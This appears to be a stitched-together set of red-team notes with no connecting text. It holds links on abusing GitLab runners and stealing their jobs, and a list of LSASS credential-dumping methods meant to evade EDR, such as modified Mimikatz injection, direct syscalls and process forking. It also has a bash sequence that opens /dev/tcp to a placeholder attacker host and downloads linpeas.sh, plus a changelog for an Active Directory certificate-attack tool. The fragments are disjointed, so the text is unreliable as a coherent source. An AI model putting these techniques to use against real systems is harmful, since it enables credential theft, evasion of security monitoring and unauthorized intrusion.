* Reconnaissance - Link
* Abusing GitLab Runners - Link
* Script for steal tasks by requesting them faster than a real runner - Link

• Unhooked Injection (Modified Mimikatz Binary) – Utilizes unhooking to inject a modified Mimikatz binary, bypassing EDR hooks and evading detection.
• Unhooked Injection (Direct Syscalls with MDWD) – Implements direct syscalls for stealthy injection using MDWD, reducing the footprint left behind.
• Simple MiniDumpWriteDump API – Executes the straightforward MiniDumpWriteDump API method for standard LSASS memory extraction.
• MINIDUMP_CALLBACK_INFORMATION Callbacks – Uses callback functions for custom handling, offering greater control over the dumping process.
• Process Forking Technique – Forks the LSASS process, creating a memory clone and avoiding direct access to the target process.
• Direct Syscalls with MiniDumpWriteDump – Combines direct syscalls with MiniDumpWriteDump, enhancing stealth by avoiding typical API hooks.
• Native Dump with Direct Syscalls (Offline Parsing) – Leverages direct syscalls to create a native dump with essential streams for offline parsing, perfect for low-noise operations.

>exec 3<>/dev/tcp/<kali-ip>/22

>echo -e "GET /linpeas.sh HTTP/1.1\r\nHost: <kali-ip>\r\nConnection: close\r\n\r\n" >&3

>cat <&3 > linpeas.sh

Missing PRs:
211: fix ESC1 false positive
229: add smime extensions support (somehow does not work completely with certipy auth)

Merged PRs:
231: add ldap simple auth
228: add ESC15
226: fix ESC1 false positive
225: fix to solve SID overwrite errors
222: fix to allow certificate names with slashes or parentheses
210: add cross domain authentication
209: accept tgs other than HOST/target@domain
203: check web enrollment for https
201: add dcom support
200: add possibility to add more than 1 keycredential and correctly list them
198: add ldap-port option
196: add ESC13
193: add whencreated and whenmodified for templates
183: hidden import (pycryptodomex)